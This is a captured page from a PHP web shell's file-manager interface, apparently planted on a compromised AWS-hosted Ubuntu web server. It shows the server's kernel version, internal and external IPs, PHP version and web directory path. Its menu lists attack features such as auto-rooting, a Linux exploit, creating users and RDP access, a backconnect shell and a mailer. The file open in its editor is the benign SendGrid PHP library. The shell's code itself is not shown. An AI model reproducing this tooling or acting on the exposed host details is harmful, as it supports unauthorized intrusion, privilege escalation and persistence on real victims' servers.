Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.12.233
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
adm /
admin /
sendgrid-php /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers
[ DIR ]
drwxr-xr-x
SendGrid.php
1.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SendGrid.php
<?php /** * This library allows you to quickly and easily send emails through SendGrid using PHP. * * @author Elmer Thomas <dx@sendgrid.com> * @copyright 2017 SendGrid * @license https://opensource.org/licenses/MIT The MIT License * @version GIT: <git_id> * @link http://packagist.org/packages/sendgrid/sendgrid */ /** * Interface to the SendGrid Web API */ class SendGrid { const VERSION = '5.4.2'; /** * * @var string */ protected $namespace = 'SendGrid'; /** * @var \SendGrid\Client */ public $client; /** * @var string */ public $version = self::VERSION; /** * Setup the HTTP Client * * @param string $apiKey your SendGrid API Key. * @param array $options an array of options, currently only "host" and "curl" are implemented. */ public function __construct($apiKey, $options = array()) { $headers = array( 'Authorization: Bearer '.$apiKey, 'User-Agent: sendgrid/' . $this->version . ';php', 'Accept: application/json' ); $host = isset($options['host']) ? $options['host'] : 'https://api.sendgrid.com'; $curlOptions = isset($options['curl']) ? $options['curl'] : null; $this->client = new \SendGrid\Client($host, $headers, '/v3', null, $curlOptions); } }
Close